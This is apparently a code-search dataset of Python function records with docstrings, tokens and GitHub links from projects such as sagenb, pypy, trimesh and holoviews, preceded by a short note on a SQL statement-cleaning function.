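A note on the cleanup pipeline this docstring describes: the sketch below reproduces the comment-stripping and whitespace-normalisation steps as a standalone function; the name clean_statements and the stripped-down regexes are illustrative, not part of pg_chameleon. One detail worth flagging: the source calls re.sub(r'/\*.*?\*/', '', statement, re.DOTALL), which passes re.DOTALL positionally into re.sub's count parameter rather than flags, so the dot does not actually cross newlines there; the sketch uses the keyword form.

import re

def clean_statements(sql_string):
    """Split a SQL string on ';' and normalise each statement onto one line."""
    cleaned = []
    for statement in sql_string.split(';'):
        stat = re.sub(r'/\*.*?\*/', '', statement, flags=re.DOTALL)  # multi-line comments
        stat = re.sub(r'--.*?\n', '', stat)                          # single-line comments
        stat = re.sub(r'\)', ' ) ', stat)                            # surround parentheses
        stat = re.sub(r'\(', ' ( ', stat)
        stat = re.sub(r',', ', ', stat)                              # space after each comma
        stat = ' '.join(stat.split())                                # one line, stripped
        if stat:
            cleaned.append(stat)
    return cleaned

print(clean_statements("CREATE TABLE t(a int, b int); -- note\nDROP TABLE t;"))
# ['CREATE TABLE t ( a int, b int )', 'DROP TABLE t']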
sagemath/sagenb
67a73cbade02639bc08265f28f3165442113ad4d
sagenb/notebook/worksheet.py
python
after_first_word
(s)
return s[i.start() + 1:]
r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace. INPUT: - ``s`` - string OUTPUT: a string EXAMPLES:: sage: from sagenb.notebook.worksheet import after_first_word sage: after_first_word("\%gap\n2+2\n") '2+2\n' sage: after_first_word("2+2") ''
r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace.
[ "r", "Return", "everything", "after", "the", "first", "whitespace", "in", "the", "string", "s", ".", "Returns", "the", "empty", "string", "if", "there", "is", "nothing", "after", "the", "first", "whitespace", "." ]
def after_first_word(s): r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace. INPUT: - ``s`` - string OUTPUT: a string EXAMPLES:: sage: from sagenb.notebook.worksheet import after_first_word sage: after_first_word("\%gap\n2+2\n") '2+2\n' sage: after_first_word("2+2") '' """ i = whitespace.search(s) if i is None: return '' return s[i.start() + 1:]
[ "def", "after_first_word", "(", "s", ")", ":", "i", "=", "whitespace", ".", "search", "(", "s", ")", "if", "i", "is", "None", ":", "return", "''", "return", "s", "[", "i", ".", "start", "(", ")", "+", "1", ":", "]" ]
https://github.com/sagemath/sagenb/blob/67a73cbade02639bc08265f28f3165442113ad4d/sagenb/notebook/worksheet.py#L4392-L4415
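The helper above depends on a module-level compiled pattern named whitespace; a self-contained rendition, assuming that pattern is simply re.compile(r'\s'), behaves like the doctests:

import re

whitespace = re.compile(r'\s')  # assumed equivalent of the module-level pattern

def after_first_word(s):
    i = whitespace.search(s)
    return '' if i is None else s[i.start() + 1:]

assert after_first_word("%gap\n2+2\n") == "2+2\n"
assert after_first_word("2+2") == ""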
mozillazg/pypy
2ff5cd960c075c991389f842c6d59e71cf0cb7d0
rpython/translator/transform.py
python
transform_extend_with_char_count
(self, block_subset)
Transforms lst += char*count to extend_with_char_count
Transforms lst += char*count to extend_with_char_count
[ "Transforms", "lst", "+", "=", "char", "*", "count", "to", "extend_with_char_count" ]
def transform_extend_with_char_count(self, block_subset): """Transforms lst += char*count to extend_with_char_count""" for block in block_subset: mul_sources = {} # maps b to (char, count) in the above notation for i in range(len(block.operations)): op = block.operations[i] if op.opname == 'mul': s0 = self.annotation(op.args[0]) s1 = self.annotation(op.args[1]) if (isinstance(s0, annmodel.SomeChar) and isinstance(s1, annmodel.SomeInteger)): mul_sources[op.result] = op.args[0], op.args[1] elif (isinstance(s1, annmodel.SomeChar) and isinstance(s0, annmodel.SomeInteger)): mul_sources[op.result] = op.args[1], op.args[0] elif (op.opname == 'inplace_add' and op.args[1] in mul_sources and self.gettype(op.args[0]) is list): v_char, v_count = mul_sources[op.args[1]] new_op = SpaceOperation('extend_with_char_count', [op.args[0], v_char, v_count], op.result) block.operations[i] = new_op
[ "def", "transform_extend_with_char_count", "(", "self", ",", "block_subset", ")", ":", "for", "block", "in", "block_subset", ":", "mul_sources", "=", "{", "}", "# maps b to (char, count) in the above notation", "for", "i", "in", "range", "(", "len", "(", "block", ...
https://github.com/mozillazg/pypy/blob/2ff5cd960c075c991389f842c6d59e71cf0cb7d0/rpython/translator/transform.py#L84-L106
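For readers outside RPython, the same peephole idea can be shown on a toy list of (opname, args, result) tuples. Everything below is illustrative stand-in data, not the real flow-graph IR: annotations become plain isinstance checks, and variables become strings.

def fuse_extend_with_char_count(operations):
    """Rewrite inplace_add(lst, mul(char, count)) into one fused op (toy IR)."""
    mul_sources = {}                      # result name -> (char, count)
    for i, (opname, args, result) in enumerate(operations):
        if opname == 'mul':
            a, b = args
            if isinstance(a, str) and isinstance(b, int):
                mul_sources[result] = (a, b)
            elif isinstance(b, str) and isinstance(a, int):   # mirror the swapped order
                mul_sources[result] = (b, a)
        elif opname == 'inplace_add' and args[1] in mul_sources:
            char, count = mul_sources[args[1]]
            operations[i] = ('extend_with_char_count', [args[0], char, count], result)
    return operations

ops = [('mul', ['x', 3], 'v0'), ('inplace_add', ['lst', 'v0'], 'v1')]
print(fuse_extend_with_char_count(ops)[1])
# ('extend_with_char_count', ['lst', 'x', 3], 'v1')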
rotki/rotki
aafa446815cdd5e9477436d1b02bee7d01b398c8
rotkehlchen/externalapis/cryptocompare.py
python
Cryptocompare.set_database
(self, database: 'DBHandler')
If the cryptocompare instance was initialized without a DB this sets its DB
If the cryptocompare instance was initialized without a DB this sets its DB
[ "If", "the", "cryptocompare", "instance", "was", "initialized", "without", "a", "DB", "this", "sets", "its", "DB" ]
def set_database(self, database: 'DBHandler') -> None: """If the cryptocompare instance was initialized without a DB this sets its DB""" msg = 'set_database was called on a cryptocompare instance that already has a DB' assert self.db is None, msg self.db = database
[ "def", "set_database", "(", "self", ",", "database", ":", "'DBHandler'", ")", "->", "None", ":", "msg", "=", "'set_database was called on a cryptocompare instance that already has a DB'", "assert", "self", ".", "db", "is", "None", ",", "msg", "self", ".", "db", "=...
https://github.com/rotki/rotki/blob/aafa446815cdd5e9477436d1b02bee7d01b398c8/rotkehlchen/externalapis/cryptocompare.py#L251-L255
mvantellingen/localshop
19422b82915e66b62f8c0207a74a6a36613796c6
src/localshop/utils.py
python
no_duplicates
(function, *args, **kwargs)
return wrapper
Makes sure that no duplicated tasks are enqueued.
Makes sure that no duplicated tasks are enqueued.
[ "Makes", "sure", "that", "no", "duplicated", "tasks", "are", "enqueued", "." ]
def no_duplicates(function, *args, **kwargs): """ Makes sure that no duplicated tasks are enqueued. """ @wraps(function) def wrapper(self, *args, **kwargs): key = generate_key(function, *args, **kwargs) try: function(self, *args, **kwargs) finally: logging.info('Removing key %s', key) cache.delete(key) return wrapper
[ "def", "no_duplicates", "(", "function", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "@", "wraps", "(", "function", ")", "def", "wrapper", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "key", "=", "generate_key", "(", ...
https://github.com/mvantellingen/localshop/blob/19422b82915e66b62f8c0207a74a6a36613796c6/src/localshop/utils.py#L25-L38
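As shown, the wrapper only computes a key and releases it in the finally block; where the already-enqueued check happens is not visible in this snippet (generate_key and cache are localshop/Django pieces). A self-contained sketch of the complete lock-and-release pattern, with a plain dict standing in for that cache, might look like:

from functools import wraps

_inflight = {}  # stand-in for the shared cache used to detect duplicates

def no_duplicates(function):
    """Skip the call when an identical one is already running (sketch)."""
    @wraps(function)
    def wrapper(*args, **kwargs):
        key = (function.__name__, args, tuple(sorted(kwargs.items())))
        if key in _inflight:
            return None                  # duplicate: drop it
        _inflight[key] = True
        try:
            return function(*args, **kwargs)
        finally:
            del _inflight[key]           # always release, mirroring the source

@no_duplicates
def fetch(url):
    return f"fetched {url}"

print(fetch("https://example.com/pkg"))  # fetched https://example.com/pkg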
lunixbochs/ActualVim
1f555ce719e49d6584f0e35e9f0db2f216b98fa5
lib/asyncio/transports.py
python
WriteTransport.get_write_buffer_size
(self)
Return the current size of the write buffer.
Return the current size of the write buffer.
[ "Return", "the", "current", "size", "of", "the", "write", "buffer", "." ]
def get_write_buffer_size(self): """Return the current size of the write buffer.""" raise NotImplementedError
[ "def", "get_write_buffer_size", "(", "self", ")", ":", "raise", "NotImplementedError" ]
https://github.com/lunixbochs/ActualVim/blob/1f555ce719e49d6584f0e35e9f0db2f216b98fa5/lib/asyncio/transports.py#L89-L91
brmson/dataset-factoid-webquestions
668890853388010fe6ae9a5eb035a7917b88933b
scripts/rawimport.py
python
questions_pproc
(questions, ch)
return qs_main, qs_fb
Post-process raw json data, outputting main and freebase-specific data sets.
Post-process raw json data, outputting main and freebase-specific data sets.
[ "Post", "-", "process", "raw", "json", "data", "outputting", "main", "and", "freebase", "-", "specific", "data", "sets", "." ]
def questions_pproc(questions, ch): """ Post-process raw json data, outputting main and freebase-specific data sets. """ qs_main = [] qs_fb = [] for i, q in enumerate(questions): q_main = {'qId': 'wq%c%06d' % (ch, i), 'qText': q['utterance'], 'answers': list(targetsToAnswers(q['targetValue']))} q_fb = {'qId': q_main['qId'], 'freebaseKey': q['url'].replace('http://www.freebase.com/view/en/', '')} qs_main.append(q_main) qs_fb.append(q_fb) return qs_main, qs_fb
[ "def", "questions_pproc", "(", "questions", ",", "ch", ")", ":", "qs_main", "=", "[", "]", "qs_fb", "=", "[", "]", "for", "i", ",", "q", "in", "enumerate", "(", "questions", ")", ":", "q_main", "=", "{", "'qId'", ":", "'wq%c%06d'", "%", "(", "ch", ...
https://github.com/brmson/dataset-factoid-webquestions/blob/668890853388010fe6ae9a5eb035a7917b88933b/scripts/rawimport.py#L29-L41
quantmind/pulsar
fee44e871954aa6ca36d00bb5a3739abfdb89b26
pulsar/apps/wsgi/content.py
python
Html.hasClass
(self, cn)
return classes and cn in classes
``True`` if ``cn`` is a class of self.
``True`` if ``cn`` is a class of self.
[ "True", "if", "cn", "is", "a", "class", "of", "self", "." ]
def hasClass(self, cn): '''``True`` if ``cn`` is a class of self.''' classes = self._classes return classes and cn in classes
[ "def", "hasClass", "(", "self", ",", "cn", ")", ":", "classes", "=", "self", ".", "_classes", "return", "classes", "and", "cn", "in", "classes" ]
https://github.com/quantmind/pulsar/blob/fee44e871954aa6ca36d00bb5a3739abfdb89b26/pulsar/apps/wsgi/content.py#L381-L384
mikedh/trimesh
6b1e05616b44e6dd708d9bc748b211656ebb27ec
trimesh/points.py
python
PointCloud.copy
(self)
return copied
Safely get a copy of the current point cloud. Copied objects will have emptied caches to avoid memory issues and so may be slow on initial operations until caches are regenerated. Current object will *not* have its cache cleared. Returns --------- copied : trimesh.PointCloud Copy of current point cloud
Safely get a copy of the current point cloud.
[ "Safely", "get", "a", "copy", "of", "the", "current", "point", "cloud", "." ]
def copy(self): """ Safely get a copy of the current point cloud. Copied objects will have emptied caches to avoid memory issues and so may be slow on initial operations until caches are regenerated. Current object will *not* have its cache cleared. Returns --------- copied : trimesh.PointCloud Copy of current point cloud """ copied = PointCloud(vertices=None) # copy vertex and face data copied._data.data = copy.deepcopy(self._data.data) # get metadata copied.metadata = copy.deepcopy(self.metadata) # make sure cache is set from here copied._cache.clear() return copied
[ "def", "copy", "(", "self", ")", ":", "copied", "=", "PointCloud", "(", "vertices", "=", "None", ")", "# copy vertex and face data", "copied", ".", "_data", ".", "data", "=", "copy", ".", "deepcopy", "(", "self", ".", "_data", ".", "data", ")", "# get me...
https://github.com/mikedh/trimesh/blob/6b1e05616b44e6dd708d9bc748b211656ebb27ec/trimesh/points.py#L443-L468
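The pattern here, deep-copy the real state and then clear the copy's cache so derived values are recomputed, is easy to lift out of trimesh. A toy version with hypothetical names:

import copy

class Cached:
    def __init__(self, data):
        self.data = data
        self._cache = {}        # derived values, lazily recomputed

    def copy(self):
        dup = copy.deepcopy(self)   # copies data and cache alike
        dup._cache.clear()          # start the copy with a cold cache
        return dup

a = Cached([1, 2, 3])
a._cache['sum'] = 6
b = a.copy()
print(b.data, b._cache, a._cache)   # [1, 2, 3] {} {'sum': 6}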
bmc/munkres
23d11c83057c7d93fa7f4ebfa191f9b746374792
munkres.py
python
Munkres.__find_star_in_col
(self, col: Sequence[AnyNum])
return row
Find the first starred element in the specified column. Returns the row index, or -1 if no starred element was found.
Find the first starred element in the specified column. Returns the row index, or -1 if no starred element was found.
[ "Find", "the", "first", "starred", "element", "in", "the", "specified", "column", ".", "Returns", "the", "row", "index", "or", "-", "1", "if", "no", "starred", "element", "was", "found", "." ]
def __find_star_in_col(self, col: Sequence[AnyNum]) -> int: """ Find the first starred element in the specified column. Returns the row index, or -1 if no starred element was found. """ row = -1 for i in range(self.n): if self.marked[i][col] == 1: row = i break return row
[ "def", "__find_star_in_col", "(", "self", ",", "col", ":", "Sequence", "[", "AnyNum", "]", ")", "->", "int", ":", "row", "=", "-", "1", "for", "i", "in", "range", "(", "self", ".", "n", ")", ":", "if", "self", ".", "marked", "[", "i", "]", "[",...
https://github.com/bmc/munkres/blob/23d11c83057c7d93fa7f4ebfa191f9b746374792/munkres.py#L392-L403
IronLanguages/main
a949455434b1fda8c783289e897e78a9a0caabb5
External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py
python
Misc.winfo_width
(self)
return getint( self.tk.call('winfo', 'width', self._w))
Return the width of this widget.
Return the width of this widget.
[ "Return", "the", "width", "of", "this", "widget", "." ]
def winfo_width(self): """Return the width of this widget.""" return getint( self.tk.call('winfo', 'width', self._w))
[ "def", "winfo_width", "(", "self", ")", ":", "return", "getint", "(", "self", ".", "tk", ".", "call", "(", "'winfo'", ",", "'width'", ",", "self", ".", "_w", ")", ")" ]
https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py#L895-L898
TesterlifeRaymond/BeautifulReport
e13ea7bc3109e8f88279f1033e309b6f909d800d
BeautifulReport.py
python
BeautifulReport.output_report
(self)
Generate the test report under the specified path :return:
Generate the test report under the specified path :return:
[ "Generate", "the", "test", "report", "under", "the", "specified", "path", ":", "return", ":" ]
def output_report(self): """ Generate the test report under the specified path :return: """ template_path = self.config_tmp_path override_path = os.path.abspath(self.log_path) if \ os.path.abspath(self.log_path).endswith('/') else \ os.path.abspath(self.log_path) + '/' with open(template_path, 'rb') as file: body = file.readlines() with open(override_path + self.filename, 'wb') as write_file: for item in body: if item.strip().startswith(b'var resultData'): head = ' var resultData = ' item = item.decode().split(head) item[1] = head + json.dumps(self.FIELDS, ensure_ascii=False, indent=4) item = ''.join(item).encode() item = bytes(item) + b';\n' write_file.write(item)
[ "def", "output_report", "(", "self", ")", ":", "template_path", "=", "self", ".", "config_tmp_path", "override_path", "=", "os", ".", "path", ".", "abspath", "(", "self", ".", "log_path", ")", "if", "os", ".", "path", ".", "abspath", "(", "self", ".", ...
https://github.com/TesterlifeRaymond/BeautifulReport/blob/e13ea7bc3109e8f88279f1033e309b6f909d800d/BeautifulReport.py#L368-L388
tomplus/kubernetes_asyncio
f028cc793e3a2c519be6a52a49fb77ff0b014c9b
kubernetes_asyncio/client/models/v2beta2_metric_spec.py
python
V2beta2MetricSpec.resource
(self, resource)
Sets the resource of this V2beta2MetricSpec. :param resource: The resource of this V2beta2MetricSpec. # noqa: E501 :type: V2beta2ResourceMetricSource
Sets the resource of this V2beta2MetricSpec.
[ "Sets", "the", "resource", "of", "this", "V2beta2MetricSpec", "." ]
def resource(self, resource): """Sets the resource of this V2beta2MetricSpec. :param resource: The resource of this V2beta2MetricSpec. # noqa: E501 :type: V2beta2ResourceMetricSource """ self._resource = resource
[ "def", "resource", "(", "self", ",", "resource", ")", ":", "self", ".", "_resource", "=", "resource" ]
https://github.com/tomplus/kubernetes_asyncio/blob/f028cc793e3a2c519be6a52a49fb77ff0b014c9b/kubernetes_asyncio/client/models/v2beta2_metric_spec.py#L148-L156
holoviz/holoviews
cc6b27f01710402fdfee2aeef1507425ca78c91f
holoviews/core/util.py
python
sort_topologically
(graph)
return list(itertools.takewhile(lambda x: x is not None, (names_by_level.get(i, None) for i in itertools.count())))
Stackless topological sorting. graph = { 3: [1], 5: [3], 4: [2], 6: [4], } sort_topologically(graph) [[1, 2], [3, 4], [5, 6]]
Stackless topological sorting.
[ "Stackless", "topological", "sorting", "." ]
def sort_topologically(graph): """ Stackless topological sorting. graph = { 3: [1], 5: [3], 4: [2], 6: [4], } sort_topologically(graph) [[1, 2], [3, 4], [5, 6]] """ levels_by_name = {} names_by_level = defaultdict(list) def add_level_to_name(name, level): levels_by_name[name] = level names_by_level[level].append(name) def walk_depth_first(name): stack = [name] while(stack): name = stack.pop() if name in levels_by_name: continue if name not in graph or not graph[name]: level = 0 add_level_to_name(name, level) continue children = graph[name] children_not_calculated = [child for child in children if child not in levels_by_name] if children_not_calculated: stack.append(name) stack.extend(children_not_calculated) continue level = 1 + max(levels_by_name[lname] for lname in children) add_level_to_name(name, level) for name in graph: walk_depth_first(name) return list(itertools.takewhile(lambda x: x is not None, (names_by_level.get(i, None) for i in itertools.count())))
[ "def", "sort_topologically", "(", "graph", ")", ":", "levels_by_name", "=", "{", "}", "names_by_level", "=", "defaultdict", "(", "list", ")", "def", "add_level_to_name", "(", "name", ",", "level", ")", ":", "levels_by_name", "[", "name", "]", "=", "level", ...
https://github.com/holoviz/holoviews/blob/cc6b27f01710402fdfee2aeef1507425ca78c91f/holoviews/core/util.py#L1271-L1321
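The function deliberately avoids recursion ("stackless") by re-pushing a node until all its children have levels. For contrast, a recursive sketch with the same contract, grouping names by longest distance from a leaf, is shorter but bounded by Python's recursion limit:

from collections import defaultdict
from itertools import count, takewhile

def sort_topologically_recursive(graph):
    """Same contract as above: group names by longest distance from a leaf."""
    levels = {}
    def level(name):
        if name not in levels:
            children = graph.get(name, [])
            levels[name] = 1 + max((level(c) for c in children), default=-1)
        return levels[name]
    for name in graph:
        level(name)
    by_level = defaultdict(list)
    for name, lvl in levels.items():
        by_level[lvl].append(name)
    return list(takewhile(lambda x: x is not None,
                          (by_level.get(i) for i in count())))

print(sort_topologically_recursive({3: [1], 5: [3], 4: [2], 6: [4]}))
# [[1, 2], [3, 4], [5, 6]]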
Pylons/substanced
a897f4a0518c51b6e093cc5af39fa326f23752c2
substanced/dump/__init__.py
python
_DumpAndLoad.load
( self, directory, parent=None, subresources=True, verbose=False, dry_run=False, registry=None )
return first
Load a dump of a resource and return the resource.
Load a dump of a resource and return the resource.
[ "Load", "a", "dump", "of", "a", "resource", "and", "return", "the", "resource", "." ]
def load( self, directory, parent=None, subresources=True, verbose=False, dry_run=False, registry=None ): """ Load a dump of a resource and return the resource.""" if registry is None: registry = get_current_registry() self.set_yaml(registry) stack = [(self.ospath.abspath(self.ospath.normpath(directory)), parent)] first = None dumpers = self.get_dumpers(registry) while stack: # breadth-first is easiest directory, parent = stack.pop() context = self._make_load_context( directory, registry, dumpers, verbose, dry_run ) self.logger.info('Loading %s' % directory) resource = context.load(parent) if first is None: first = resource if not subresources: break subobjects_dir = self.ospath.join(directory, RESOURCES_DIRNAME) if self.ospath.exists(subobjects_dir): for fn in self.oslistdir(subobjects_dir): fullpath = self.ospath.join(subobjects_dir, fn) subresource_fn = self.ospath.join( fullpath, RESOURCE_FILENAME ) if ( self.ospath.isdir(fullpath) and self.ospath.exists(subresource_fn) ): stack.append((fullpath, resource)) callbacks = registry.pop('loader_callbacks', ()) for callback in callbacks: callback(first) return first
[ "def", "load", "(", "self", ",", "directory", ",", "parent", "=", "None", ",", "subresources", "=", "True", ",", "verbose", "=", "False", ",", "dry_run", "=", "False", ",", "registry", "=", "None", ")", ":", "if", "registry", "is", "None", ":", "regi...
https://github.com/Pylons/substanced/blob/a897f4a0518c51b6e093cc5af39fa326f23752c2/substanced/dump/__init__.py#L191-L250
paulwinex/pw_MultiScriptEditor
e447e99f87cb07e238baf693b7e124e50efdbc51
multi_script_editor/jedi/evaluate/helpers.py
python
search_call_signatures
(user_stmt, position)
return call, index
Returns the function Call that matches the position before.
Returns the function Call that matches the position before.
[ "Returns", "the", "function", "Call", "that", "matches", "the", "position", "before", "." ]
def search_call_signatures(user_stmt, position): """ Returns the function Call that matches the position before. """ debug.speed('func_call start') call, index = None, 0 if user_stmt is not None and isinstance(user_stmt, pr.Statement): # some parts of the statement will be removed user_stmt = fast_parent_copy(user_stmt) arr, index = call_signature_array_for_pos(user_stmt, position) if arr is not None: call = arr.parent debug.speed('func_call parsed') return call, index
[ "def", "search_call_signatures", "(", "user_stmt", ",", "position", ")", ":", "debug", ".", "speed", "(", "'func_call start'", ")", "call", ",", "index", "=", "None", ",", "0", "if", "user_stmt", "is", "not", "None", "and", "isinstance", "(", "user_stmt", ...
https://github.com/paulwinex/pw_MultiScriptEditor/blob/e447e99f87cb07e238baf693b7e124e50efdbc51/multi_script_editor/jedi/evaluate/helpers.py#L114-L128
dpgaspar/Flask-AppBuilder
557249f33b66d02a48c1322ef21324b815abe18e
flask_appbuilder/cli.py
python
fab
()
FAB flask group commands
FAB flask group commands
[ "FAB", "flask", "group", "commands" ]
def fab(): """ FAB flask group commands""" pass
[ "def", "fab", "(", ")", ":", "pass" ]
https://github.com/dpgaspar/Flask-AppBuilder/blob/557249f33b66d02a48c1322ef21324b815abe18e/flask_appbuilder/cli.py#L32-L34
Azure/azure-linux-extensions
a42ef718c746abab2b3c6a21da87b29e76364558
Common/libpsutil/py2.6-glibc-2.12-pre/psutil/__init__.py
python
_assert_pid_not_reused
(fun)
return wrapper
Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused.
Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused.
[ "Decorator", "which", "raises", "NoSuchProcess", "in", "case", "a", "process", "is", "no", "longer", "running", "or", "its", "PID", "has", "been", "reused", "." ]
def _assert_pid_not_reused(fun): """Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused. """ @functools.wraps(fun) def wrapper(self, *args, **kwargs): if not self.is_running(): raise NoSuchProcess(self.pid, self._name) return fun(self, *args, **kwargs) return wrapper
[ "def", "_assert_pid_not_reused", "(", "fun", ")", ":", "@", "functools", ".", "wraps", "(", "fun", ")", "def", "wrapper", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "if", "not", "self", ".", "is_running", "(", ")", ":", "rais...
https://github.com/Azure/azure-linux-extensions/blob/a42ef718c746abab2b3c6a21da87b29e76364558/Common/libpsutil/py2.6-glibc-2.12-pre/psutil/__init__.py#L265-L274
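The decorator can be exercised without psutil by faking the pieces it touches (is_running, pid, _name); everything below is a stand-in, including the simplified NoSuchProcess:

import functools

class NoSuchProcess(Exception):
    pass

def _assert_pid_not_reused(fun):
    """Raise NoSuchProcess when the process died or its PID was recycled."""
    @functools.wraps(fun)
    def wrapper(self, *args, **kwargs):
        if not self.is_running():
            raise NoSuchProcess((self.pid, self._name))
        return fun(self, *args, **kwargs)
    return wrapper

class FakeProcess:
    pid, _name = 1234, "demo"
    def is_running(self):
        return False              # simulate an exited process

    @_assert_pid_not_reused
    def terminate(self):
        print("terminating")

try:
    FakeProcess().terminate()
except NoSuchProcess as exc:
    print("refused:", exc)        # refused: (1234, 'demo')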
ambakick/Person-Detection-and-Tracking
f925394ac29b5cf321f1ce89a71b193381519a0b
core/prefetcher.py
python
prefetch
(tensor_dict, capacity)
return prefetch_queue
Creates a prefetch queue for tensors. Creates a FIFO queue to asynchronously enqueue tensor_dicts and returns a dequeue op that evaluates to a tensor_dict. This function is useful in prefetching preprocessed tensors so that the data is readily available for consumers. Example input pipeline when you don't need batching: ---------------------------------------------------- key, string_tensor = slim.parallel_reader.parallel_read(...) tensor_dict = decoder.decode(string_tensor) tensor_dict = preprocessor.preprocess(tensor_dict, ...) prefetch_queue = prefetcher.prefetch(tensor_dict, capacity=20) tensor_dict = prefetch_queue.dequeue() outputs = Model(tensor_dict) ... ---------------------------------------------------- For input pipelines with batching, refer to core/batcher.py Args: tensor_dict: a dictionary of tensors to prefetch. capacity: the size of the prefetch queue. Returns: a FIFO prefetcher queue
Creates a prefetch queue for tensors.
[ "Creates", "a", "prefetch", "queue", "for", "tensors", "." ]
def prefetch(tensor_dict, capacity): """Creates a prefetch queue for tensors. Creates a FIFO queue to asynchronously enqueue tensor_dicts and returns a dequeue op that evaluates to a tensor_dict. This function is useful in prefetching preprocessed tensors so that the data is readily available for consumers. Example input pipeline when you don't need batching: ---------------------------------------------------- key, string_tensor = slim.parallel_reader.parallel_read(...) tensor_dict = decoder.decode(string_tensor) tensor_dict = preprocessor.preprocess(tensor_dict, ...) prefetch_queue = prefetcher.prefetch(tensor_dict, capacity=20) tensor_dict = prefetch_queue.dequeue() outputs = Model(tensor_dict) ... ---------------------------------------------------- For input pipelines with batching, refer to core/batcher.py Args: tensor_dict: a dictionary of tensors to prefetch. capacity: the size of the prefetch queue. Returns: a FIFO prefetcher queue """ names = list(tensor_dict.keys()) dtypes = [t.dtype for t in tensor_dict.values()] shapes = [t.get_shape() for t in tensor_dict.values()] prefetch_queue = tf.PaddingFIFOQueue(capacity, dtypes=dtypes, shapes=shapes, names=names, name='prefetch_queue') enqueue_op = prefetch_queue.enqueue(tensor_dict) tf.train.queue_runner.add_queue_runner(tf.train.queue_runner.QueueRunner( prefetch_queue, [enqueue_op])) tf.summary.scalar('queue/%s/fraction_of_%d_full' % (prefetch_queue.name, capacity), tf.to_float(prefetch_queue.size()) * (1. / capacity)) return prefetch_queue
[ "def", "prefetch", "(", "tensor_dict", ",", "capacity", ")", ":", "names", "=", "list", "(", "tensor_dict", ".", "keys", "(", ")", ")", "dtypes", "=", "[", "t", ".", "dtype", "for", "t", "in", "tensor_dict", ".", "values", "(", ")", "]", "shapes", ...
https://github.com/ambakick/Person-Detection-and-Tracking/blob/f925394ac29b5cf321f1ce89a71b193381519a0b/core/prefetcher.py#L20-L61
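tf.PaddingFIFOQueue and tf.train.queue_runner are TF1-era APIs. The underlying idea, a bounded queue filled by a background producer so consumers never wait on preprocessing, can be sketched in plain Python; the producer callable and the dict payload here are invented for the demo:

import queue
import threading

def prefetch(producer, capacity):
    """Keep up to `capacity` results from producer() ready for consumers."""
    q = queue.Queue(maxsize=capacity)

    def fill():
        while True:
            q.put(producer())     # blocks while the queue is full

    threading.Thread(target=fill, daemon=True).start()
    return q

counter = iter(range(1000))
pq = prefetch(lambda: {'image': next(counter)}, capacity=20)
print(pq.get()['image'], pq.get()['image'])   # 0 1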
out0fmemory/GoAgent-Always-Available
c4254984fea633ce3d1893fe5901debd9f22c2a9
server/lib/google/appengine/datastore/datastore_query.py
python
PropertyFilter._to_pb
(self)
return self._filter
Returns the internal only pb representation.
Returns the internal only pb representation.
[ "Returns", "the", "internal", "only", "pb", "representation", "." ]
def _to_pb(self): """Returns the internal only pb representation.""" return self._filter
[ "def", "_to_pb", "(", "self", ")", ":", "return", "self", ".", "_filter" ]
https://github.com/out0fmemory/GoAgent-Always-Available/blob/c4254984fea633ce3d1893fe5901debd9f22c2a9/server/lib/google/appengine/datastore/datastore_query.py#L365-L367
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_hxb2/lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/dom.py
python
TreeWalker.getParentNode
(self, node)
return node.parentNode
[]
def getParentNode(self, node): return node.parentNode
[ "def", "getParentNode", "(", "self", ",", "node", ")", ":", "return", "node", ".", "parentNode" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/dom.py#L42-L43
Mindwerks/worldengine
64dff8eb7824ce46b5b6cb8006bcef21822ef144
worldengine/model/world.py
python
World.has_biome
(self)
return 'biome' in self.layers
[]
def has_biome(self): return 'biome' in self.layers
[ "def", "has_biome", "(", "self", ")", ":", "return", "'biome'", "in", "self", ".", "layers" ]
https://github.com/Mindwerks/worldengine/blob/64dff8eb7824ce46b5b6cb8006bcef21822ef144/worldengine/model/world.py#L912-L913
vipul-sharma20/sharingan
25504394fccbade08a3903adfebeccab61410340
sharingan/main.py
python
Image._crop_poly
(self, name, *args, **kwargs)
Crop by the coordinates of mouse clicks :returns: None
Crop by the coordinates of mouse clicks
[ "Crop", "by", "the", "coordinates", "of", "mouse", "clicks" ]
def _crop_poly(self, name, *args, **kwargs): """ Crop by the coordinates of mouse clicks :returns: None """ mask = np.zeros(self.gray.shape, dtype=np.uint8) roi_corners = np.array([self.path], dtype=np.int32) channel_count = 2 ignore_mask_color = (255,) * channel_count cv2.fillPoly(mask, roi_corners, ignore_mask_color) masked_image = cv2.bitwise_and(self.gray, mask) cv2.imwrite(SEGMENTED_PLACEHOLDER.format(name=name), masked_image)
[ "def", "_crop_poly", "(", "self", ",", "name", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "mask", "=", "np", ".", "zeros", "(", "self", ".", "gray", ".", "shape", ",", "dtype", "=", "np", ".", "uint8", ")", "roi_corners", "=", "np", "...
https://github.com/vipul-sharma20/sharingan/blob/25504394fccbade08a3903adfebeccab61410340/sharingan/main.py#L184-L198
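Outside the class, the masking step reduces to numpy plus cv2.fillPoly. The sketch below returns the masked image instead of writing it to SEGMENTED_PLACEHOLDER (the path template the method assumes); the triangle coordinates are made up:

import numpy as np
import cv2  # assumes opencv-python is installed

def crop_poly(gray, path):
    """Zero out everything outside the clicked polygon (standalone sketch)."""
    mask = np.zeros(gray.shape, dtype=np.uint8)
    roi_corners = np.array([path], dtype=np.int32)  # one polygon
    cv2.fillPoly(mask, roi_corners, 255)            # white inside the polygon
    return cv2.bitwise_and(gray, mask)

img = np.full((100, 100), 200, dtype=np.uint8)
out = crop_poly(img, [(10, 10), (90, 10), (50, 90)])
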